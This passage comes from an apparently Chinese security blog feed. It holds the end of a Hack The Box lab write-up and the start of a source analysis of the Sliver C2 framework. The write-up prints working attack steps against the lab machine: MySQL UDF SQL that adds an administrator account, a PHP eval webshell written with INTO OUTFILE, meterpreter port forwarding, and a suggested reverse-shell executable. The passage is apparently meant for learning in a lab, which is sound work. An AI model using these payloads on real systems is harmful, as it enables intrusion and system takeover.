Found</span><br></pre></td></tr></table></figure><p>看来完整的靶机体验肯定有udf提权,大概吧</p><p><a href="https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-mysql#windows">3306 - Pentesting Mysql | HackTricks</a></p><p>可以用这个命令来进行udf提权,其中需要先把<code>lib_mysqludf_sys.dll</code>上传到目标机器,这个dll在msf的目录里可以直接找到,也有现成模块mysql_udf_payload用,但是刚刚失败了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># CHech the linux comments for more indications</span><br><span class="line">USE mysql;</span><br><span class="line">CREATE TABLE npn(line blob);</span><br><span class="line">INSERT INTO npn values(load_file('C:\\Users\\M.harris\\lib_mysqludf_sys.dll'));</span><br><span class="line">show variables like '%plugin%';</span><br><span class="line">SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll';</span><br><span class="line">CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';</span><br><span class="line">SELECT sys_exec("net user npn npn12345678 /add");</span><br><span class="line">SELECT sys_exec("net localgroup Administrators npn /add");</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [outputwall]> show variables like '%secure_file_priv%';</span><br><span class="line">+------------------+-------+</span><br><span class="line">| Variable_name | Value |</span><br><span class="line">+------------------+-------+</span><br><span class="line">| secure_file_priv | |</span><br><span class="line">+------------------+-------+</span><br><span class="line">1 row in set (0.905 sec)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>G了,那个文件夹它真没有,而我的用户(m.harris)没那个写入权限,没办法进行修改</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">MariaDB [mysql]> SELECT * FROM mysql.npn INTO DUMPFILE 'C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\lib\\plugin\\lib_mysqludf_sys_32.dll';</span><br><span class="line">ERROR 1 (HY000): Can't create/write to file 'C:\Program Files\Output Messenger Server\Plugins\Output\mysql\lib\plugin\lib_mysqludf_sys_32.dll' (Errcode: 2 "No such file or directory")</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>看来这个靶机的完整体验还得再看看那个<code>OutputMessengerApache.zip</code><br>映入眼帘的是OutputApache.ini </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat OutputApache.ini </span><br><span class="line">[SETTINGS]</span><br><span class="line">Address=127.0.0.1</span><br><span class="line">WebPort=14126</span><br><span class="line">Version=1.0.0</span><br><span class="line"></span><br><span class="line">[NOTIFICATION]</span><br><span class="line">address=localhost</span><br><span class="line">port=8124</span><br><span class="line"></span><br><span class="line">[PATHCONFIG]</span><br><span class="line">;apache2.4.9</span><br><span class="line">Apache=apache2</span><br><span class="line">;php5.5.12</span><br><span class="line">PHP=php</span><br><span class="line">Log=log</span><br><span class="line">def_conf=settings</span><br><span class="line">WebRoot=www</span><br><span class="line">Backup=backup</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>先把端口转发过来看看</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">portfwd add -l 14126 -L 0.0.0.0 -p 14126 -r 10.10.11.31</span><br></pre></td></tr></table></figure><p>看这个质朴的样子,大概就是要我直接写一个webshell了吧<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907142601.png"></p><p>但是我现在并不知道他的目录在哪</p><p>而且我没权限</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"> Directory of C:\Program Files</span><br><span class="line"></span><br><span class="line">02/23/2024 06:06 AM <DIR> .</span><br><span class="line">02/23/2024 06:06 AM <DIR> ..</span><br><span class="line">12/04/2023 10:22 AM <DIR> Common Files</span><br><span class="line">08/21/2024 01:50 PM <DIR> Hyper-V</span><br><span class="line">02/19/2024 04:52 AM <DIR> internet explorer</span><br><span class="line">02/23/2024 06:06 AM <DIR> Output Messenger</span><br><span class="line">09/06/2024 06:17 AM <DIR> Output Messenger Server</span><br><span class="line">12/12/2023 11:04 AM <DIR> PackageManagement</span><br><span class="line">02/19/2024 05:16 AM <DIR> Update Services</span><br><span class="line">12/04/2023 10:23 AM <DIR> VMware</span><br><span class="line">11/05/2022 12:03 PM <DIR> Windows Defender</span><br><span class="line">08/21/2024 01:50 PM <DIR> Windows Defender Advanced Threat Protection</span><br><span class="line">11/05/2022 12:03 PM <DIR> Windows Mail</span><br><span class="line">08/21/2024 01:50 PM <DIR> Windows Media Player</span><br><span class="line">09/15/2018 12:19 AM <DIR> Windows Multimedia Platform</span><br><span class="line">09/15/2018 12:28 AM <DIR> windows nt</span><br><span class="line">11/05/2022 12:03 PM <DIR> Windows Photo Viewer</span><br><span class="line">09/15/2018 12:19 AM <DIR> Windows Portable Devices</span><br><span class="line">09/15/2018 12:19 AM <DIR> Windows Security</span><br><span class="line">12/12/2023 11:04 AM <DIR> WindowsPowerShell</span><br><span class="line"> 0 File(s) 0 bytes</span><br><span class="line"> 20 Dir(s) 46,382,149,632 bytes free</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这里已知</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Program Files\Output Messenger Server\Plugins\Output\mysql\</span><br></pre></td></tr></table></figure><p>是mysql的目录<br>使用msyql读一下my.ini看看</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\my.ini');</span><br></pre></td></tr></table></figure><p>结果是读取成功</p><p>在压缩包<code>OutputMessengerMysql.zip</code>的解压目录里<code>find my.ini</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─$ find . -name "my.ini" 2>/dev/null</span><br><span class="line">./settings/my.ini</span><br><span class="line">./mysql/my.ini</span><br><span class="line">./mysql/data/my.ini</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这里最大概率是第二个</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./mysql/my.ini</span><br></pre></td></tr></table></figure><p>但是为了验证正确性<br>我再来读一次</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\mysql\\data\\my.ini');</span><br></pre></td></tr></table></figure><p>成功了<br>那么可以确认了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">C:\Program Files\Output Messenger Server\Plugins\Output\mysql\</span><br><span class="line">对应</span><br><span class="line">OutputMessengerMysql.zip压缩包的子目录mysql</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">C:\Program Files\Output Messenger Server\Plugins\Output\ 就是这个zip解压的地方</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\OutputMysql.ini');</span><br></pre></td></tr></table></figure><p><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907144147.png"></p><p>合理怀疑另一个zip也就是OutputMessengerApache.zip 也会在这里解压</p><p>只需要读OutputApache.ini即可进行验证</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\OutputApache.ini');</span><br></pre></td></tr></table></figure><p>猜对了,读成功了</p><p>那么整体的路径就拨云见日</p><p>现在写webshell到www路径即可</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php @eval($_GET['qwer']);?></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select "<?php @eval($_GET['qwer']);?>" INTO OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\gshell.php";</span><br></pre></td></tr></table></figure><p>命令执行不了,难受,还把靶机搞垮了</p><p>赶紧读一下php.ini</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./settings/php.ini</span><br><span class="line">./php/php.ini</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\php\\php.ini');</span><br><span class="line"></span><br><span class="line">这个disable_functions里面是空的</span><br><span class="line"></span><br><span class="line">SELECT LOAD_FILE('C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\settings\\php.ini');</span><br><span class="line">这个也是空的???</span><br></pre></td></tr></table></figure><p>难不成之前成功了,只是因为执行命令把靶机搞垮了而已,还是说运气不好别人刚好在重置靶机???</p><p>算了我也重置一次靶机,重新走一遍取经路</p><p>干脆用最朴实的php命令执行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select "<?php echo `whoami`;?>" INTO OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\whoami.php";</span><br></pre></td></tr></table></figure><p>至此,得到朴实无华的<code>nt authority\system</code><br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240907152646.png"><br>如果实在想要搞到msf的shell,可以把写入的php文件改成对应的载荷的路径,假如使用的是”reverse.exe”,这样就可以快乐的使用meterpreter</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select "<?php echo `path/reverse.exe`;?>" INTO OUTFILE "C:\\Program Files\\Output Messenger Server\\Plugins\\Output\\www\\whoami.php";</span><br></pre></td></tr></table></figure><h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>对这个渗透过程进行梳理</p><p>1.首先对目标进行端口扫描,服务识别,得到端口、域名、以及主机相关信息<br>2.然后配置好dns服务器,为更好地域渗透做准备<br>3.收集目标系统用户信息,构造用户字典<br>4.使用kerbrute枚举存在的用户<br>5.使用GetNPUsers获取不需要Kerberos预身份验证的用户,得到一份hash,并使用hashcat进行破解<br>6.利用得到的凭据进行getshell、以及密码喷洒<br>7.使用bloodhound获取域控的结构,并分析出一条可用的攻击路径,并根据攻击路径拿到立足点<br>8.使用msf进行权限维持<br>9.使用PEASS-NG遍历可能的提权路径,根据进程列表中的进程找到了两个zip压缩包,分别为msyql和apache<br>10.分析两个压缩包,使用端口转发,暴露目标机器mysql的数据库端口,获取了数据库root权限<br>11.猜测apache的网站路径,通过mysql进行文件写入,使用php进行命令执行,由于php是使用的<code>nt authority\system</code>,那么拿到webshell即可拿到最高权限。</p>]]></content>
<categories>
<category> hack-the-box </category>
</categories>
<tags>
<tag> HTB </tag>
<tag> 域渗透 </tag>
</tags>
</entry>
<entry>
<title>sliver源码分析-初始化以及脚手架</title>
<link href="/2024/08/12/sliver%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90-%E5%88%9D%E5%A7%8B%E5%8C%96%E4%BB%A5%E5%8F%8A%E8%84%9A%E6%89%8B%E6%9E%B6/"/>
<url>/2024/08/12/sliver%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90-%E5%88%9D%E5%A7%8B%E5%8C%96%E4%BB%A5%E5%8F%8A%E8%84%9A%E6%89%8B%E6%9E%B6/</url>
<content type="html"><![CDATA[<h1 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h1><ul><li><strong>项目概述</strong>:对开源的C2框架sliver进行源码分析,意图学习其原理。本篇分析sliver的入口以及脚手架,和基本的配置文件</li><li><strong>目标与读者</strong>:网络安全兴趣爱好者</li></ul><h1 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>准备工作</h1><ul><li>源码路径<a href="https://github.com/BishopFox/sliver">BishopFox/sliver: Adversary Emulation Framework (github.com)</a><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/BishopFox/sliver.git</span><br></pre></td></tr></table></figure></li><li>go语言环境<br><a href="https://go.dev/doc/install">Download and install - The Go Programming Language</a></li><li>vscode<br><a href="https://code.visualstudio.com/download">Download Visual Studio Code - Mac, Linux, Windows</a></li></ul><h1 id="入口点"><a href="#入口点" class="headerlink" title="入口点"></a>入口点</h1><p>由于sliver是CS架构的系统,而且主要功能在服务端所以分析目标是sliver-server<br>这里查看到入口点的内容只有运行cli.Execute()<br>server/main.go</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> (</span><br><span class="line"><span class="string">"github.com/bishopfox/sliver/server/cli"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line">cli.Execute()</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>server/cli/cli.go</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Execute - Execute root command</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">Execute</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">if</span> err := rootCmd.Execute(); err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">os.Exit(<span class="number">1</span>)</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>这里的cli.Execute()运行的就是rootCmd.Execute(),所以要重点关注rootCmd</p><p>跳转到github.com/bishopfox/sliver/server/cli,发现其使用的脚手架框架是github.com/spf13/cobra</p><p>如果对cobra不太熟悉,可以看看这个UP做的视频<br><a href="https://www.bilibili.com/video/BV1ka4y177iK">https://www.bilibili.com/video/BV1ka4y177iK</a><br>Cobra 是由 Go 团队成员 <a href="https://xie.infoq.cn/link?target=https://spf13.com/">spf13</a> 为 <a href="https://xie.infoq.cn/link?target=https://gohugo.io/">Hugo</a> 项目创建的,并已被许多流行的 Go 项目所采用,如 Kubernetes、Helm、Docker (distribution)、Etcd 等。<br>简而言之就是可以方便的编写带有参数的命令行程序。</p><h2 id="rootCmd"><a href="#rootCmd" class="headerlink" title="rootCmd"></a>rootCmd</h2><p>这里摆上server/cli/cli.go的部分源码</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> rootCmd = &cobra.Command{</span><br><span class="line">Use: <span class="string">"sliver-server"</span>,</span><br><span class="line">Short: <span class="string">""</span>,</span><br><span class="line">Long: <span class="string">``</span>,</span><br><span class="line">Run: <span class="function"><span class="keyword">func</span><span class="params">(cmd *cobra.Command, args []<span class="type">string</span>)</span></span> {</span><br><span class="line"><span class="comment">// Root command starts the server normally</span></span><br><span class="line"></span><br><span class="line">appDir := assets.GetRootAppDir() <span class="comment">//makedir $HOME/.sliver</span></span><br><span class="line">logFile := initConsoleLogging(appDir)</span><br><span class="line"><span class="keyword">defer</span> logFile.Close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">defer</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">if</span> r := <span class="built_in">recover</span>(); r != <span class="literal">nil</span> {</span><br><span class="line">log.Printf(<span class="string">"panic:\n%s"</span>, debug.Stack())</span><br><span class="line">fmt.Println(<span class="string">"stacktrace from panic: \n"</span> + <span class="type">string</span>(debug.Stack()))</span><br><span class="line">os.Exit(<span class="number">99</span>)</span><br><span class="line">}</span><br><span class="line">}()</span><br><span class="line"></span><br><span class="line">assets.Setup(<span class="literal">false</span>, <span class="literal">true</span>)</span><br><span class="line">certs.SetupCAs()</span><br><span class="line">certs.SetupWGKeys()</span><br><span class="line">cryptography.AgeServerKeyPair()</span><br><span class="line">cryptography.MinisignServerPrivateKey()</span><br><span class="line">c2.SetupDefaultC2Profiles()</span><br><span class="line"></span><br><span class="line">serverConfig := configs.GetServerConfig()</span><br><span class="line">listenerJobs, err := db.ListenerJobs()</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">err = StartPersistentJobs(listenerJobs)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">fmt.Println(err)</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> serverConfig.DaemonMode {</span><br><span class="line">daemon.Start(daemon.BlankHost, daemon.BlankPort, serverConfig.DaemonConfig.Tailscale)</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">os.Args = os.Args[:<span class="number">1</span>] <span class="comment">// Hide cli from grumble console</span></span><br><span class="line">console.Start()</span><br><span class="line">}</span><br><span class="line">},</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>由于这个是rootCmd,所以其中Use: “sliver-server”表示这个命令本身。cobra在-h等参数中会告诉这个命令是什么命令,这里就是指的是”sliver-server”。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">└─$ sliver-server -h</span><br><span class="line">Usage://Use: <span class="string">"sliver-server"</span> 指的就这下面的例子,用于提示这个命令是什么</span><br><span class="line"> sliver-server [flags] </span><br><span class="line"> sliver-server [<span class="built_in">command</span>]</span><br><span class="line"></span><br><span class="line">Available Commands:</span><br><span class="line"> builder Start the process as an external builder</span><br><span class="line"> completion Generate the autocompletion script <span class="keyword">for</span> the specified shell</span><br><span class="line"> daemon Force start server <span class="keyword">in</span> daemon mode</span><br><span class="line"> export-ca Export certificate authority</span><br><span class="line"> <span class="built_in">help</span> Help about any <span class="built_in">command</span></span><br><span class="line"> import-ca Import certificate authority</span><br><span class="line"> operator Generate operator configuration files</span><br><span class="line"> unpack Unpack assets and <span class="built_in">exit</span></span><br><span class="line"> version Print version and <span class="built_in">exit</span></span><br><span class="line"></span><br><span class="line">Flags:</span><br><span class="line"> -h, --<span class="built_in">help</span> <span class="built_in">help</span> <span class="keyword">for</span> sliver-server</span><br><span class="line"></span><br><span class="line">Use <span class="string">"sliver-server [command] --help"</span> <span class="keyword">for</span> more information about a <span class="built_in">command</span>.</span><br></pre></td></tr></table></figure><p><code>Run: func(cmd *cobra.Command, args []string) </code>是这个命令(sliver-server)需要运行的内容<br>首先执行<code>appDir := assets.GetRootAppDir()</code></p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// GetRootAppDir - Get the Sliver app dir, default is: ~/.sliver/</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">GetRootAppDir</span><span class="params">()</span></span> <span class="type">string</span> {</span><br><span class="line">value := os.Getenv(envVarName)</span><br><span class="line"><span class="keyword">var</span> dir <span class="type">string</span></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(value) == <span class="number">0</span> {</span><br><span class="line">user, _ := user.Current()</span><br><span class="line">dir = filepath.Join(user.HomeDir, <span class="string">".sliver"</span>)</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line">dir = value</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> _, err := os.Stat(dir); os.IsNotExist(err) {</span><br><span class="line">err = os.MkdirAll(dir, <span class="number">0700</span>)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">setupLog.Fatalf(<span class="string">"Cannot write to sliver root dir %s"</span>, err)</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> dir</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>可以从上面的注释看到这个就是在当前用户的home目录下创建<code>.sliver</code>目录</p><p>然后再执行<code>logFile := initConsoleLogging(appDir)</code></p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Initialize logging</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">initConsoleLogging</span><span class="params">(appDir <span class="type">string</span>)</span></span> *os.File {</span><br><span class="line">log.SetFlags(log.LstdFlags | log.Lshortfile)</span><br><span class="line">logFile, err := os.OpenFile(filepath.Join(appDir, <span class="string">"logs"</span>, logFileName), os.O_RDWR|os.O_CREATE|os.O_APPEND, <span class="number">0</span>o600)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">log.Fatalf(<span class="string">"Error opening file: %v"</span>, err)</span><br><span class="line">}</span><br><span class="line">log.SetOutput(logFile)</span><br><span class="line"><span class="keyword">return</span> logFile</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>其中<code>logFileName = "console.log" 所以该函数就是创建</code>~/.sliver/logs/console.log`, 并返回这个文件到变量logFile<br>接着执行下面的两个函数</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">defer</span> logFile.Close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">defer</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> {</span><br><span class="line"><span class="keyword">if</span> r := <span class="built_in">recover</span>(); r != <span class="literal">nil</span> {</span><br><span class="line">log.Printf(<span class="string">"panic:\n%s"</span>, debug.Stack())</span><br><span class="line">fmt.Println(<span class="string">"stacktrace from panic: \n"</span> + <span class="type">string</span>(debug.Stack()))</span><br><span class="line">os.Exit(<span class="number">99</span>)</span><br><span class="line">}</span><br><span class="line">}()</span><br></pre></td></tr></table></figure><p>前者<code>defer logFile.Close()</code>表示在当前函数生存期最后把logFile关闭<br>后者是使用<code>recover()</code>函数确认是否出现panic,如果没有产生panic,r的值就是nil,如果产生了panic,就用后面的语句对panic进行处理<br>这里要注意的是 先defer后调用,有点类似于压栈操作</p><p>后面接着一系列初始化操作</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">assets.Setup(<span class="literal">false</span>, <span class="literal">true</span>) <span class="comment">//assets init</span></span><br><span class="line">certs.SetupCAs() <span class="comment">//ca init</span></span><br><span class="line">certs.SetupWGKeys() <span class="comment">//wireguard key init</span></span><br><span class="line">cryptography.AgeServerKeyPair() <span class="comment">//Get teh server's ECC key pair</span></span><br><span class="line">cryptography.MinisignServerPrivateKey() <span class="comment">//Get the server's minisign key pair</span></span><br><span class="line">c2.SetupDefaultC2Profiles()</span><br></pre></td></tr></table></figure><p>第一个<code>assets.Setup(false, true)</code>,对各种资源进行初始化,例如开头的banner。<br><code>certs.SetupCAs() </code>初始化了CA证书<br><code>certs.SetupWGKeys() </code>初始化了wireguard key<br><code>cryptography.AgeServerKeyPair() </code>初始化了ECC秘钥对<br><code>cryptography.MinisignServerPrivateKey()</code>初始化minisign秘钥对<br><code>c2.SetupDefaultC2Profiles()</code>初始化默认的C2Profiles</p><h1 id="配置文件"><a href="#配置文件" class="headerlink" title="配置文件"></a>配置文件</h1><h2 id="server-json"><a href="#server-json" class="headerlink" title="server.json"></a>server.json</h2><p>首先便是服务端的配置文件</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">serverConfig := configs.GetServerConfig()</span><br></pre></td></tr></table></figure><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">GetServerConfig</span><span class="params">()</span></span> *ServerConfig {</span><br><span class="line">configPath := GetServerConfigPath()</span><br><span class="line">config := getDefaultServerConfig()</span><br><span class="line">.....</span><br><span class="line"><span class="comment">//后面的内容就是读取configPath的路径的json格式的配置文件解析到config进行使用和保存</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// GetServerConfigPath - File path to config.json</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">GetServerConfigPath</span><span class="params">()</span></span> <span class="type">string</span> {</span><br><span class="line">appDir := assets.GetRootAppDir()</span><br><span class="line">serverConfigPath := filepath.Join(appDir, <span class="string">"configs"</span>, serverConfigFileName)</span><br><span class="line">serverConfigLog.Debugf(<span class="string">"Loading config from %s"</span>, serverConfigPath)</span><br><span class="line"><span class="keyword">return</span> serverConfigPath</span><br><span 